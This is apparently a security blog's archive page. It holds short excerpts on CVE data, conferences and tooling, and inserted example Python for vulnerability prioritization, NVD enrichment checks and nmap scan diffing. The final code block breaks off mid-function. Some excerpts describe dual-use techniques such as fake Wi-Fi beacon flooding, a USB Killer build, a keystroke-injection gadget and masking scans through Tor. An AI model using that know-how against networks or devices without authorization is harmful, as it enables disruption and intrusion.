I play golf. I am not good at golf. But I have a Garmin Approach R10 launch monitor, a Python interpreter, and too much free time, so naturally I spent way more time building a dashboard to analyze my swing data than I did actually swinging a club. The result is jgamblin/golf, a self-hosted analytics pipeline that turns your Garmin…
Jerry Gamblin
https://jerrygamblin.com/ · 110 posts · history since 2016 · active
13 May
18 Apr
I spend a significant amount of my time thinking about EPSS, CVSS, and the inherent gaps in how we prioritize vulnerabilities. We all know the drill: a 9.8 CRITICAL that remains unexploited shouldn’t jump the line ahead of a 7.5 HIGH that is being actively used in the wild. Closing that gap between theoretical severity and actual exploitability is why…
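As an added example (not code from the post), here is a small ranking that encodes the point above: exploitation evidence, a CISA KEV listing or a high EPSS score, outranks CVSS severity, and CVSS is only the fallback for findings with no such signal. The CVE IDs, scores and KEV flags are constructed placeholders, and the 0.10 EPSS cut-off is an assumed policy knob rather than a standard.

```python
"""Rank findings by exploitation evidence before CVSS severity.

Added example, not from the original post. The findings and their EPSS/KEV values
are constructed; the 0.10 EPSS cut-off is an assumed policy knob, not a standard.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    cve: str
    cvss: float      # CVSS v3.x base score, 0.0-10.0
    epss: float      # EPSS probability of exploitation within 30 days, 0.0-1.0
    in_kev: bool     # listed in CISA's Known Exploited Vulnerabilities catalog


# Constructed sample inventory; the IDs are placeholders, not real CVE records.
SAMPLE = [
    Finding("CVE-0000-0001", cvss=9.8, epss=0.004, in_kev=False),  # critical on paper, no exploitation signal
    Finding("CVE-0000-0002", cvss=7.5, epss=0.910, in_kev=True),   # high severity, actively exploited
    Finding("CVE-0000-0003", cvss=5.3, epss=0.020, in_kev=False),
    Finding("CVE-0000-0004", cvss=8.8, epss=0.430, in_kev=False),  # high EPSS but not (yet) in KEV
]


def priority_key(f: Finding, epss_threshold: float = 0.10) -> tuple:
    """Sort key where a larger tuple means 'fix sooner'.

    Tier 2: in KEV (known exploited).  Tier 1: EPSS at or above the threshold.
    Tier 0: everything else, ordered by CVSS as the usual fallback.
    """
    if f.in_kev:
        return (2, f.epss, f.cvss)
    if f.epss >= epss_threshold:
        return (1, f.epss, f.cvss)
    return (0, f.cvss, f.epss)


def prioritize(findings, epss_threshold: float = 0.10) -> list:
    """Return CVE IDs in remediation order, most urgent first."""
    ranked = sorted(findings, key=lambda f: priority_key(f, epss_threshold), reverse=True)
    return [f.cve for f in ranked]


def cvss_only(findings) -> list:
    """The order a severity-only report gives you, for comparison."""
    return [f.cve for f in sorted(findings, key=lambda f: f.cvss, reverse=True)]


if __name__ == "__main__":
    print("CVSS only     :", cvss_only(SAMPLE))
    print("exploit-aware :", prioritize(SAMPLE))
```

With the sample data the severity-only list puts the unexploited 9.8 first; the exploit-aware list puts the KEV-listed 7.5 first and the 9.8 third, behind the 8.8 whose EPSS is above the threshold.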
1 Jan
2025 set a new baseline with 48,185 published CVEs. While the sheer volume is climbing, the median CVSS score remained surprisingly stable. We are seeing a distinct shift toward web application flaws (specifically in the CMS ecosystem) and a wider distribution of vendors, proving that vulnerabilities are spreading deeper into the supply chain. This massive growth is exactly why I…
14 Aug 2025
I’m incredibly excited to finally share something I’ve been pouring my heart into at RogoLabs. For those of you who caught my talk at BSidesLV, you got a sneak peek, but today it’s official: CNAScorecard.org is live! For years, the CVE program has been our shared language for identifying vulnerabilities. But lately, we’ve all felt the growing pains. We’re seeing…
30 Jul 2025
It’s that time of year again! The first week of August means my annual trip to the desert for “Security Summer Camp”—the whirlwind of BSides Las Vegas, Black Hat, and DEF CON. It’s always an exhausting but amazing week, and I can’t wait to dive in, catch up with everyone, and talk about what I’ve been working on. This year,…
5 Jan 2025
2024 brought unprecedented growth in CVE data, so I figured it would be appropriate to start the new year by exploring these statistics and highlighting some of the more intriguing data points. CVEs By The Numbers We ended 2024 with 40,009 published CVEs, up over 38% from the 28,818 CVEs published in 2023. CVEs By Month Month CVEs Percentage January…
30 Oct 2024
The Common Vulnerabilities and Exposures (CVE) program, launched in late October 1999, has not only marked its presence but has become a pivotal force in shaping how we perceive and manage cybersecurity threats. A Journey Through Time The CVE program emerged as a beacon, standardizing how vulnerabilities are identified, shared, and mitigated. From its inception with just 321 entries, it…
30 May 2024
The Last 100+ Days The NVD posted the notice below on its webpage in mid-February. Since then, nearly 13,000 CVEs have not been enriched with CWE, CVSS, and CPE data. The vulnerability management community was told that it would be addressed at Vulncon this year. At the conference, we were told the enrichment would restart “in the next couple of…
5 Jan 2024
Every year, I get asked, “How many CVEs do you think will be published this year?“ I am always willing to take a guess, but last year, I read Time Series Forecasting in Python. As I started to read more about the Kalman Filter, I figured it would work great for predicting CVE growth, so I built a simple model…
3 Jan 2024
2023 marked another year of record growth in CVE data, and I thought it fitting to kick off the new year by delving into these statistics and showcasing some of the more interesting data points. CVEs By The Numbers We ended 2023 with 28,902 published CVEs, up over 15% from the 25,081 CVEs published in 2022. On average, there were…
2 Aug 2023
Hacker Summer Camp, as it is colloquially known, is three security conferences that are all next week in Las Vegas. The three conferences that make up Security Summer Camp are: While preparing for these conferences, I dug through their schedules and picked out the talks I was most interested in catching. BSides Las Vegas BSides Las Vegas is back with a…
3 Jul 2023
With the first half of 2023 over, I figured I would take some time and review the data and highlight some of the most interesting data points so far this year. This GitHub repo contains the code for all the data and graphs this blog uses. By The Numbers So far this year, there have been 14,129 published CVEs. On…
3 Apr 2023
Reference Rot (also called link rot) is when hyperlinks, over time, cease to point to their originally targeted file, web page, or server due to that resource being relocated to a new address or permanently unavailable. Tod Beardsley from the CVE board gave a talk at the 2023 CVE Global Summit called ‘Link Rot: The Problem and Archiving for Posterity‘…
1 Jan 2023
2022 was a record-breaking growth year for CVE data, and I figured it would be a great way to start the new year by going through the data and highlighting some of the most interesting data points. All the data and graphs used in this blog are available in this GitHub repo. CVEs By The Numbers We ended 2022 with…
16 Nov 2022
The National Vulnerability Database plays a vital role in the CVE publication process that many people may overlook or not know they are responsible for. After MITRE publishes a CVE, the NVD enriches it with data points that make it actionable by security companies and professionals. Some of these data points include: CWE, CVSS 3.1 Base Score, CPE. I was recently asked how…
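The enrichment gap this post and the May 2024 post on the NVD backlog both describe can be checked for programmatically. This is an added example, not the author's code: it walks records in the NVD API 2.0 JSON layout (`vulnerabilities[].cve` with `metrics`, `weaknesses` and `configurations`) and reports which are missing NVD-supplied CVSS, CWE or CPE data. The three records are constructed stand-ins, and the check assumes that NVD's own analysis is the entry whose `source` is `nvd@nist.gov`, which is how it tells NVD enrichment apart from a CNA-supplied score.

```python
"""Report which NVD records still lack the enrichment NVD adds after MITRE publishes.

Added example, not from the original posts. Uses the NVD API 2.0 JSON layout;
the records below are constructed stand-ins, not real NVD data.
"""
import json

# Assumption: NVD-supplied metrics/weaknesses carry this source string.
NVD_SOURCE = "nvd@nist.gov"

# Constructed sample feed: one fully enriched record, one with only CNA-supplied
# CVSS and a placeholder CWE, one with nothing beyond the ID.
SAMPLE_FEED = json.loads("""
{
  "vulnerabilities": [
    {"cve": {"id": "CVE-0000-1001", "vulnStatus": "Analyzed",
      "metrics": {"cvssMetricV31": [{"source": "nvd@nist.gov", "type": "Primary",
        "cvssData": {"version": "3.1", "baseScore": 7.5, "baseSeverity": "HIGH"}}]},
      "weaknesses": [{"source": "nvd@nist.gov", "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-79"}]}],
      "configurations": [{"nodes": [{"operator": "OR", "negate": false,
        "cpeMatch": [{"vulnerable": true,
          "criteria": "cpe:2.3:a:example:app:1.0:*:*:*:*:*:*:*"}]}]}]}},
    {"cve": {"id": "CVE-0000-1002", "vulnStatus": "Awaiting Analysis",
      "metrics": {"cvssMetricV31": [{"source": "cna@example.org", "type": "Secondary",
        "cvssData": {"version": "3.1", "baseScore": 9.8, "baseSeverity": "CRITICAL"}}]},
      "weaknesses": [{"source": "cna@example.org", "type": "Secondary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}]}},
    {"cve": {"id": "CVE-0000-1003", "vulnStatus": "Received"}}
  ]
}
""")


def nvd_cvss(cve: dict):
    """NVD's own CVSS base score (v3.1, falling back to v3.0), or None."""
    metrics = cve.get("metrics", {})
    for key in ("cvssMetricV31", "cvssMetricV30"):
        for m in metrics.get(key, []):
            if m.get("source") == NVD_SOURCE:
                return m["cvssData"].get("baseScore")
    return None


def nvd_cwes(cve: dict) -> list:
    """CWE identifiers assigned by NVD; placeholders like NVD-CWE-noinfo don't count."""
    found = []
    for w in cve.get("weaknesses", []):
        if w.get("source") != NVD_SOURCE:
            continue
        for d in w.get("description", []):
            if d.get("value", "").startswith("CWE-"):
                found.append(d["value"])
    return found


def cpes(cve: dict) -> list:
    """All CPE match criteria in the record's configurations."""
    found = []
    for cfg in cve.get("configurations", []):
        for node in cfg.get("nodes", []):
            for m in node.get("cpeMatch", []):
                found.append(m["criteria"])
    return found


def enrichment_report(feed: dict) -> dict:
    """Map CVE id -> {'status': vulnStatus, 'missing': [fields]}; empty list == enriched."""
    report = {}
    for item in feed["vulnerabilities"]:
        cve = item["cve"]
        missing = []
        if nvd_cvss(cve) is None:
            missing.append("cvss")
        if not nvd_cwes(cve):
            missing.append("cwe")
        if not cpes(cve):
            missing.append("cpe")
        report[cve["id"]] = {"status": cve.get("vulnStatus"), "missing": missing}
    return report


def unenriched(feed: dict) -> list:
    """Sorted IDs of records missing at least one enrichment field."""
    return sorted(cid for cid, r in enrichment_report(feed).items() if r["missing"])


if __name__ == "__main__":
    for cid, r in enrichment_report(SAMPLE_FEED).items():
        print(cid, r["status"], "missing:", ", ".join(r["missing"]) or "nothing")
```

Run against a real pull from the 2.0 API the same function separates "Analyzed" records from the backlog, and the `status` field tells you whether a gap is NVD still working ("Awaiting Analysis") or a record that was simply never enriched.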
29 Oct 2022
For a recent project, I needed all the NVD CVE and EPSS data in Elasticsearch and couldn’t find an easy way to do it, so I built CVElk. CVElk quickly builds a local Elastic Stack using docker compose with the help of a simple shell and python script. Philipp Krenn from Elastic also contributed an updated dashboard to the project…
27 Jul 2022
Security Summer Camp, as it is colloquially known, is three security conferences that occur during the same week in Las Vegas. The three conferences that make up Security Summer Camp are: BSides Las Vegas, Black Hat USA and DEF CON. While preparing for these conferences, I dug through their schedules and picked out the talks I was interested in catching. BSides Las…
13 May 2022
Covid restrictions are starting to be relaxed, so I am beginning to feel like Willie and am getting on the road again, and in the next six weeks, I am attending and presenting at these four amazing events. BSidesKy I am amazingly excited to attend bsides.ky in the Cayman Islands at the end of May, where I will be leading…
30 Dec 2021
I have spent a lot of time this year working with CVE data and most of that time in Jupyter notebooks. Over the holiday season, I decided to build a website from these notebooks using GitHub Actions, GitHub Pages and nbconvert. CVE.ICU ended up being the end product, and here is the source code. It is still an early work…
23 Jul 2021
In A Study in Scarlet, Sherlock Holmes said, “It is a capital mistake to theorize before one has data,” which is one of my favorite Sherlock quotes. For the last month or so, my team has been dealing with missing CPE data points in the MITRE CPE data, and it finally forced me to sit down and put together a…
17 Jul 2021
I was recently asked if I had ever thought about trying to predict CVE growth. I had not, and really didn’t even know where to start, but after some research I found the Prophet project, a forecasting library open-sourced by Facebook that uses the GAM family of models. Using Prophet with the NVD data in a Jupyter notebook…
6 Apr 2021
The first quarter of 2021 has been a busy quarter for the Project Zero (P0) team as they announced 16 “in the wild” zero-days. That is one new announcement a week on average. This is great for driving news cycles or if you’re in marketing and need some FUD to help sales. This isn’t so great if you are…
28 Dec 2020
That was the simple question I asked myself on Saturday morning, thinking the answer would likely be simple to find. It wasn’t and ended up 48 hours later with me building this jupyter notebook to find out. I really thought it would be as easy as pulling down the NVD data feeds and running a simple nvd['Published'].value_counts().head(10) to find out…
17 Dec 2020
I monitor the @CVENew Twitter feed to keep up with any interesting new vulnerabilities that are released. On December 11th CVE-2020-29589 was published claiming that “the kapacitor Docker images through 1.5.0-alpine contain a blank password for the root user” and that it has a CVSS score of 9.8. This CVE was just a re-report of CVE-2019-5021, which I researched last…
11 Dec 2020
I joined Kenna Security two years ago as their Principal Security Engineer not long after my friend JCran joined as the Head of Research. In the last two years, while building the security team, I have stayed deeply involved with the research team, and from time to time, some of that research was made public: Fifth of Docker Containers Have…
27 Aug 2020
GitHub Actions was launched last November and it has taken a little while to mature, but it has recently got to the point where you can build a fairly robust application security pipeline using GitHub Actions. In most of my projects, I can run a linter, an SCA, a SAST and a DAST tool against my code daily using open source…
18 May 2020
I have been spending a lot of time over the last few weeks looking at osquery to get a better understanding of what it can do, since it seems every major security tool from Sophos to Cisco to CarbonBlack is building it into their product. I have also been looking at Jupyter notebooks for machine learning and data science…
25 Mar 2020
Did you know you can easily turn any video from YouTube into a background for Zoom (Version 4.6.4+) using a simple command-line tool called youtube-dl. One of my favorite videos is The Traveling Bird Feeder so I will use it for this example. Install youtube-dl: brew install youtube-dl Then fingerprint the video: youtube-dl -F https://www.youtube.com/watch?v=vu72ja_mGME Then download any video larger…
23 Feb 2020
Last summer I launched vulnerablecontainers.org to help shed light on the number of vulnerabilities in the 1,000 most popular containers on Docker Hub. While it was an interesting project, right after I launched it I had multiple people ask if it was able to scan other public containers. Initially it wasn’t, but I wanted to offer the ability, so…
18 Feb 2020
With the RSA Conference less than a week away, I figured I would spend a few minutes and write a quick post about what I am excited to see this year in San Francisco. Not At RSA: Like most security conferences these days, while the conference itself is the reason I go, the auxiliary events end up providing a majority…
16 Jan 2020
One of my personal projects this year is to understand and build a SLAM (Simultaneous localization and mapping) robot. To get started I bought the Xaxxon OpenLidar and after a few struggles getting it to work correctly in a VM I finally did and decided to throw together my build notes for future reference. Virtual Platform While I would have…
26 Dec 2019
As the 2010s come to an end I started to think about what security stories from the last ten years changed how we think about security in this decade and the next. While this list is in no way complete these are the ten stories that I think had a lasting impact on security in the last decade and the…
12 Dec 2019
I had a New Year’s resolution to Read More Books this past year and actually read around 20 books this year. Out of those books, here is a quick list of some of my favorites from the past year that I really enjoyed. Stillness Is the Key This book was probably one of the most impactful books I read this…
6 Dec 2019
I spent the last week at AWS re:Invent 2019 in Las Vegas with over 65,000 other AWS users. This conference is always jam-packed with announcements and interesting discussions with people both inside and outside of my normal security bubble. Overall I really enjoy this conference even though it is ridiculously large and I spent over 6 hours on the…
12 Nov 2019
This week I gave a talk on Hacking Holiday Lights at Kenna Security and here is the promised accompanying blog that outlines the hardware and software I demoed for easy reference for anyone who wants to build their own holiday lights. Controller Boards I looked at a bunch of different boards that ended up having a variety of technical hurdles…
23 Oct 2019
I have been meaning to look at Cartography since I saw their talk at BSidesSF last year, and I finally had a chance to start looking at it today. One of the first things I noticed was that it was not containerized, so I built a quick container for it and decided to document my progress here. Prerequisites AWS CLI…
19 Sept 2019
I just spent a day and a half recovering my Github account after the code in my 2FA application stopped working for authentication. GitHub has a good support article on how to recover your account that has this ominous warning on it: Warning: For security reasons, GitHub Support may not be able to restore access to accounts with two-factor authentication…
8 Jul 2019
About once a month I need a Kali VM to use for an hour or so, and I am terrible at keeping a VM up-to-date, so this weekend I took a few hours and built a tool to automatically download, provision and update a Kali Linux VM in VirtualBox. All the code for this project is in this GitHub project.…
2 Jul 2019
Recently I have been working on a project to use the Trivy container scanner to scan a large swath of containers for open vulnerabilities that I wanted to quickly post here. There is a full blog about the project here on the Kenna site. Here are some of the pages I have built out so far: Top 1000 Popular Containers Scanned…
22 Apr 2019
I had the chance to attend LoCoMoCoSec this year and had a fantastic time. It was a well-run conference that was extremely focused on being friendly for families and being inclusive of the diverse group of people who make up our community. It also doesn’t hurt that it was in one of the most beautiful places I have ever seen.…
22 Feb 2019
With the 2019 RSA Conference fast approaching, I thought I would take a few minutes and put together a quick list of what I am excited to see this year. Sunday BSides San Francisco How to Build an Application Security Program (Presenting) Automating Web Application Bug Hunting (Presenting With @JCran) Monday RSAC Innovation Sandbox Contest CSA Summit BSides San Francisco…
26 Jan 2019
Bundle Audit is a great tool to check if the Ruby Gems used in your project have any known vulnerabilities. Most DevOps teams I know run this tool against their builds in their CI/CD process when deploying. This can mean that code that is not updated often can have vulnerable gems unless you have a way to continually monitor your…
15 Dec 2018
I have developed a bad habit of picking up vanity domain names and not really doing much with them. Last month at AWS re:Invent I picked up ServerlessSecurity.org and really wanted to do something with it but didn’t feel like maintaining, or paying for, a VPS, so after doing some looking around I found that it was possible to point…
10 Dec 2018
Here is a list of my favorite security books from 2018 if you are looking for that last minute gift or have some extra time around the holidays to catch up on some reading. The GCHQ Puzzle Book 2 I just got The GCHQ Puzzle Book 2, and like the original, it has quickly become the book that I always…
1 Dec 2018
I spent this last week in Las Vegas attending AWS re:Invent. This event is mind-numbingly massive, with classes happening at 4 or 5 hotels all over the strip. I personally spent over an hour every day on their (nice but extremely slow) shuttle buses between the MGM Grand, Aria and the Sands Expo Center. It would be impossible to see…
8 Nov 2018
I have started using the Burp Suite 2.0 beta full time recently, and some of the new features I knew I wanted to explore more were the API and the CI integration. I took a few hours this last week and built a small POC shell script that will scan a website and open GitHub Issues for all findings. Here…
30 Oct 2018
Introduction I have always been a fan of Google products, so when they announced the Google Home Hub, I ordered one. Once I got the Hub on my network I scanned it and it returned the following:

Nmap scan report for hub
Host is up (0.046s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
8008/tcp  open  http
8009/tcp  open  ajp13
8443/tcp  open  https-alt
9000/tcp  open  cslistener
10001/tcp…
30 Aug 2018
The new REST API in Burp 2.0 is going to be amazing, and it will allow things like this 9-line shell script I wrote this morning that will grab all public bounty sites from @arkadiyt’s bounty-targets-data repo and kick off a full scan. https://gist.github.com/jgamblin/c22c0791af7572280d7fd569141650fe I almost didn’t post this blog because I *think* this script is, in general,…
28 Aug 2018
I spend a lot of time working with macOS and I have noticed that out of the box the operating system has some basic security settings that are not enabled by default, so I built a small script that automates configuring these. It does the following: Requires Password Immediately After Sleep. Turns On Firewall. Enables Stealth Mode. Disables Remote…
7 May 2018
Recently I have noticed that companies that use G Suite have a fairly common misconfiguration that is making their internal groups public. In some cases it is just the names of the groups, but in some extreme cases the content of the posts is public. Testing for this misconfiguration on your domain is as easy as looking at: https://groups.google.com/a/%yourdomain.tld%/forum/#!forumsearch/ Google…
5 Mar 2018
I am a fan of Kali Linux and AWS so I love the fact that they have an official AMI. While spinning up a Kali instance in AWS is fairly easy, I had a long flight today so I wrote a script that will spin up a Kali instance in about 60 seconds. The script does the following: Builds a…
5 Jan 2018
Recently while working on a project I wanted to run OWASP Dependency-Check against a GitHub organization to find any out-of-date frameworks, but I couldn’t find an easy way to do it so I built a tool. Right now it will check Node and Ruby applications and put all the out-of-date frameworks in a single CSV.…
29 Dec 2017
On Friday, January 6th 2017 I walked into the first yoga class of my life at YogaSol as part of fulfilling a New Year’s resolution. I was in the best shape of my life. I was running, swimming and lifting weights multiple times a week. I weighed 165 pounds and was at 9% body fat. I was also really stressed…
5 Nov 2017
Like most security professionals I am spending a large amount of time helping my company move securely to AWS. Certificate management in AWS is done with AWS Certificate Manager and while they do offer *free* certificates, ACM generated certs are outside your direct control. You don’t get the keys which, at least for some things, should probably be a non-starter…
4 Sept 2017
Last November I hacked together a script that continually monitored your network and sent a Slack alert when something changed. It worked, but I was never 100% happy with it, so I spent some time this weekend and rewrote it so that it is hopefully more user friendly and functional. Some changes in this version include the ability to set timeouts…
24 Aug 2017
I was working on a project recently and was asked if it was possible to stop users from setting common passwords. Using the pam_cracklib module and @DanielMiessler’s common passwords list it is as simple as these 3 commands:

sudo apt-get install libpam-cracklib -y
sudo wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_1000000.txt -O /usr/share/dict/million.txt
sudo create-cracklib-dict /usr/share/dict/million.txt

Seriously
19 Aug 2017
ModSecurity is the most widely known and used server-based Web Application Firewall, but I had not had a chance to play with it, so I decided to take some time this weekend to build a website (modsec.handsonhacking.org) to test it. Here is a small walk-through of how I did it. Base Server Install: I used AWS Lightsail to build…
14 Aug 2017
One of the things that even the new macOS beta is missing is MAC address randomization on boot. After spending a few hours working on it, I put together this completely hacky solution that uses Spoof and an Automator script saved as an application. Here is how I configured it: Install Spoof Open Automator Select “Application” Add “Run AppleScript” Copy…
14 Jul 2017
Security summer camp is about a week away so I spent some time this afternoon trying to figure out what talks and events I want to make sure I attend. BSides Las Vegas: A Day in the Life of a Product Security Incident Response Manager From SOC to CSIRT Hadoop Safari : Hunting For Vulnerabilities Introduction to Reversing and Pwning…
3 Jul 2017
I recently saw this SSH/HTTP(S) multiplexer on GitHub and tweeted that it looked amazing: An amazingly cool tool to run a webserver and a ssh on the same port: https://t.co/Z2eel3aIq5 — Jerry Gamblin (@JGamblin) July 2, 2017 A couple of people responded that you should be able to do the same thing with HAProxy or something similar, but my experience with…
12 Jun 2017
Often while doing research I need temporary access to a bunch of different virtual machines. While it is possible to do this on my Macbook using VMWare Fusion or Virtualbox the overhead seems unnecessary for something I will delete in under a week. My goto solution is a virtualization stack of: 16GB DigitalOcean Droplet + Wok + Kimchi Here is…
11 Jun 2017
I love OWASP (I wanted to get that out of the way) but they let their TLS certificate expire yesterday: Should it have happened to an organization whose whole goal is to secure web applications? No. There are a million reasons why their TLS certificate could have expired and plenty of reasons it shouldn’t have (OWASP uses letsencrypt for their…
29 May 2017
Have you ever wanted to control a vast medium small network of honeypots but only had an hour and about $40 a month to spend on your project? So did I! So with the help of DigitalOcean and Anomali’s Modern Honey Network we can now do it! For a basic distributed Cowrie network you will need: 1 – $20…
16 May 2017
In the last couple of years the anti-vaccination crowd in the United States has started to make inroads, with more and more people deciding that the perceived risk of the vaccination outweighs the known risk of the disease. When you ask them why they don’t vaccinate they always have anecdotal evidence of how the vaccination could hurt them, how they…
4 May 2017
As I continue to try to learn R, I am trying to build tools that other people might find useful. Tonight with the help of Bob Rudis I built a script that will find domains with a keyword in it from DomainPunch, do a geoip lookup and map it if it is online. Since it is time to start thinking…
30 Apr 2017
Since I have started looking at the Umbrella DNS Popularity List, I was interested in seeing how much the data changes day to day. I fired up RStudio and wrote some terrible code but finally got it to work with some help. Yesterday there were 80,937 new DNS names on the list that were not on the list the day…
29 Apr 2017
Recently I started looking at the Umbrella DNS Popularity List and did a blog post about it here. The data seemed valuable and lacking at the same time so I spent my *limited* free time this week learning about R and RStudio. Protip: If you want to play along at home there is an RStudio docker container so all you…
25 Apr 2017
Cisco offers a daily list of the million most queried domain names from Umbrella (OpenDNS) users. I had some time this weekend so I decided to spend some time playing around with the data to see what I could find, so I spun up a Lightsail server and got to work. Grabbing the file is as simple as: wget http://s3-us-west-1.amazonaws.com/umbrella-static/top-1m.csv.zip You…
17 Apr 2017
I am a huge fan of Tim Tomes and his Burp Suite Configuration Suggestions blog post. The problem is that I only use Burp a couple times a month and end up facing this screen and have to re-configure Burp on every launch: So I built burpsettings.json that: Disables Browser XSS Protection, Disables Burp Collaborator Server, Disables Intercept by Default…
13 Apr 2017
Today I was asked if it was possible to generate a list of domain names registered every day with a keyword in the record (company name, city, trademark, etc). There are a few paid services that do this, and domainpunch.com has a web-based tool that will do this, but I wanted to automate it so I could use it with…
3 Apr 2017
I am a big fan of DigiCert for TLS Certificates and CA/WebPKI services. While they have amazing customer support and are an amazing company to work with, there are not a lot of automation scripts to interact with their API available. So over the weekend and with a lot of help from Clint Wilson I built a shell script that:…
31 Mar 2017
An amazing mentor and leader I work with has been talking to me recently about what real leadership looks like and shared with me a list of quotes he keeps on his desk that his dad who had a leadership role in the military collected and gave to him. He gave me a copy and said I was free to…
29 Mar 2017
I am reading a book called “The Art of Authenticity” and in the book over a couple of chapters it talks about understanding what makes strong leaders and deciding who you should follow. I have pulled these 10 questions out of those chapters: What was your first leadership role? When you think about the process of becoming the leader that…
8 Mar 2017
Certificate transparency logs are an amazing way to get a good overview of your certificate landscape, detect fraud (bad guys also use TLS) and find shadow IT and unknown cloud services. The problem is that there are not many good places to search these logs. The best I have found is from Symantec, although it is slow and errors out…
5 Mar 2017
Ever since Charlie Miller hacked a Jeep while it was driving on the interstate I have wanted to learn more about Car Hacking but really had not had a chance to get started with it until a month ago when I ordered a Carloop and was ready to get hacking: … or so I thought. Turns out car hacking is…
9 Feb 2017
The RSA conference starts next week and, let’s be honest, it is becoming known as a stuffy management conference with very little useful technical information, but if you know where to look you can take some deep dives. I have put together a quick guide of some amazing talks and events I am looking forward to. Talks: BSidesSF – Coming…
20 Jan 2017
I was lucky enough to get a hold of an Insta360 Nano this week and it is some of the most amazing technology I have seen recently. It allows for truly instant 360 photos, videos and timelapse captures. As one of the people I was showing it to this week said it is the “selfiestick of 2017”. Here are some…
19 Jan 2017
I was at dinner on Tuesday with 6 security professionals and I proposed this hypothetical situation and I thought it was worth writing up and sharing. Background: Six identical safes with $1,000,000 inside are being built into the side of a public building and are being randomly assigned to everyone at the dinner. At the end of 90 days any…
6 Jan 2017
Scanning a host with Nmap is a fairly routine act for some in security, but from time to time you want to either get a different view of a host or try to conceal your public IP. In this case I use this simple “trick” to run an nmap scan through Tor. To do so you need…
30 Dec 2016
Yesterday US-CERT released information on GRIZZLY STEPPE, the malware used in the DNC hack. The IP and hash information provided by US-CERT was really lacking, so I decided to dig through it and see if I could make more of it. The first thing I did was to run the IPs through an ipinfo2sheets spreadsheet I put together earlier…
29 Dec 2016
In November I saw this youtube video on turning a USB Air Purifier into a $75 USB Killer: My soldering skills are basically nonexistent so while I had some time off around the holidays I decided this would be a decent project to help improve them. So in early December I ordered 3 of these from Amazon: USB ionic Oxygen…
22 Dec 2016
I had a coach whose favorite quote was “Pain is the best teacher.” and that was the first thing that popped into my head this morning when I realized that I had left an $80 a month Digital Ocean Droplet running for an extra 3 weeks after I got done using it. To be honest $60 isn’t *that* painful but…
21 Dec 2016
I am a huge fan of snow and hacky one line linux commands. Thanks to some amazing people on twitter and a little too much free time at the end of the year they have both combined to bring snow to your terminal window just in time for your winter based holiday. This command works on OSX out of the…
20 Dec 2016
What will 2017 hold for the security industry? I sat down and looked into my crystal ball and came up with these 8 security predictions for 2017. A Fortune 500 Will Use “DDOS as a Service” To Attack A Competitor. A bored VP of Marketing with a paypal account, a six pack and a nephew who can get him on…
4 Dec 2016
I have been playing with my stack of pizero a bunch lately and tonight I decided to put together a piZero OTG Ethernet gadget that runs Kali (Really KaToolin), XRDP and Mate in a computer on a stick configuration. This way I have a full (as I want it to be) Kali installation with me as long as I have…
30 Nov 2016
I have been playing with my stack of piZeros recently and started to read about the kernel OTG gadgets and was intrigued by the OTG_HID gadget. So after doing some reading I found that someone had ported the USB Rubber Ducky platform to the piZero and called it rspiducky. Building it is fairly straightforward, but if you…
28 Nov 2016
I have been reading a lot about beacon frames on my vacation this week (stop laughing) and I came across a tool in Kali called MDK3 that will allow you to send fake beacon frames. I couldn’t pass up a chance to test this so I pulled out my trusty TL-WN722N and made a list of the 5,000 most common…
26 Nov 2016
Thanks to PoisonTap I have finally had a reason to pull my PiZero out of the ever growing “Stuff to Hack” pile and start working on it. I have a couple of neat ideas that are coming down the pipeline but this weekend I built a VPN sidecar using a USB OTG Gadget. I wanted to be able to use…
13 Nov 2016
In the last two years Burp Suite Proxy has become my go to web application security scanner. As with everything recently if I can automate it, I do. So this weekend I built a simple script to scan a website with Burp, create a PDF report and post it to Slack: Here is how I set it up: Create a…
9 Nov 2016
I have recently been automating a lot of my technical security tasks and building slack bots around them and it was w3af‘s turn. W3af is an amazing open source web application security scanner that my friend Andres Riancho writes and maintains. The goal of this project was to build scheduled and automated scans of my web properties with pdf reporting…
5 Nov 2016
As I have talked about before, “You can’t defend what you don’t know exists,” so today while sitting around and trying to recover from walking pneumonia I wrote slackmap to continually nmap a network and post the differences to Slack: Configuration is amazingly easy. I run a copy of this on a $5 a month DigitalOcean Droplet for an external…
4 Nov 2016
I am often asked “What is the easiest thing companies can do to secure their networks?” and my answer is always “Know what is on your network.” While that is simple advice, it is a lot harder to implement. One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans)…
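Here is the core of that scheduled-scan-and-diff loop, as an added example rather than slackmap’s own code (it also applies to the network-monitor rewrite from September 2017 above). It parses two `nmap -oX` XML outputs, constructed here as successive runs against a 192.0.2.0/24 segment, reports hosts and open ports that appeared or vanished, and formats the result as the message you would post; the Slack webhook POST itself is left out so the example runs offline, and only `open` ports count so a flapping `filtered` state does not page anyone.

```python
"""Diff two nmap XML scans and report hosts/ports that appeared or disappeared.

Added example, not from the original posts or from slackmap. The two XML
documents are constructed stand-ins for successive `nmap -oX` runs against the
same segment (192.0.2.0/24 is the documentation range).
"""
import xml.etree.ElementTree as ET

YESTERDAY = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    </ports></host>
</nmaprun>"""

TODAY = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.0.2.12" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/></port>
      <port protocol="tcp" portid="8080"><state state="filtered"/><service name="http-proxy"/></port>
    </ports></host>
</nmaprun>"""


def open_ports(xml_text: str) -> dict:
    """Return {ipv4: {'tcp/22', ...}} for every host that is up; open ports only."""
    result = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
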